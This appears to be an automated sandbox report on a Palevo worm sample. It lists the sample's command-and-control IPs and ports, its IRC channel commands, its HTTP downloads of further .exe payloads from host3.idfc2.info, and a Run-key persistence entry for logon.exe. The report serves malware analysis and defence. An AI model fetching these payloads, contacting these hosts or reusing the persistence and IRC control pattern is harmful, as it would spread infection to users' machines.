67.43.236.68 (Palevo worm)

Remote Host      Port Number
67.43.236.68     1863
98.126.28.121    80

* The data identified by the following URLs was then requested from the remote web server:
o http://host3.idfc2.info/fdc2.exe
o http://host3.idfc2.info/fdc1.exe

USER cakzts cakzts cakzts :vyrkvehxejzvjqvi
NICK obpHQJTST
MODE obpHQJTST +xi
JOIN #rstn3
USERHOST obpHQJTST
MODE ##a +smntu
MODE ##b +smntu
MODE ##c +smntu
MODE #rstn3 +smntu

There was outbound traffic produced on port 80:

00000000 | 4745 5420 2F6B 6F6B 2E65 7865 2048 5454 | GET /kok.exe HTT
00000010 | 502F 312E 300D 0A48 6F73 743A 2068 6F73 | P/1.0..Host: hos
00000020 | 7433 2E69 6466 6332 2E69 6E66 6F0D 0A0D | t3.idfc2.info...
00000030 | 0A47 4554 202F 3434 2E65 7865 2048 5454 | .GET /44.exe HTT
00000040 | 502F 312E 300D 0A48 6F73 743A 2068 6F73 | P/1.0..Host: hos
00000050 | 7433 2E69 6466 6332 2E69 6E66 6F0D 0A0D | t3.idfc2.info...
00000060 | 0A

* The following ports were open in the system:

Port     Protocol   Process
1052     TCP        logon.exe (%System%\logon.exe)
10801    TCP        logon.exe (%System%\logon.exe)

Registry Modifications

* The following Registry Key was created:
o HKEY_CURRENT_USER\Software\bcrypt

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ Windows Logon Application = "%System%\logon.exe"

so that logon.exe runs every time Windows starts
o [HKEY_CURRENT_USER\Software\bcrypt]
+ i = 0x000007D9

Memory Modifications

* There was a new process created in the system:

Process Name   Process Filename       Main Module Size
logon.exe      %System%\logon.exe     131 072 bytes
